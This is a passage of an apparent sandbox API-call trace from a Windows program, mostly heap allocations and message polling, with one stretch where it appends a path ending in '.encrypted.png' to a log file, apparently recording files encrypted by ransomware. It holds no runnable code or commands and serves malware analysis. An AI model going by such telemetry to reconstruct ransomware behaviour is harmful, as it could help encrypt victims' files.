lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.651] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.651] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.651] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.651] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.652] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.652] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.652] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.652] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x31fd, lpOverlapped=0x0) returned 1 [0041.652] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.652] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x31fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.653] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.encrypted.png\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0041.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab338 [0041.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.encrypted.png\r\n", cchWideChar=62, lpMultiByteStr=0x7ab338, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 62 [0041.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.653] WriteFile (in: hFile=0x128, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3d, lpOverlapped=0x0) returned 1 [0041.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.653] CloseHandle (hObject=0x128) returned 1 [0041.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.656] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.656] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.657] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.657] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.657] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.657] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.658] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.661] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.662] HeapFree (in: hHeap=0x770000, 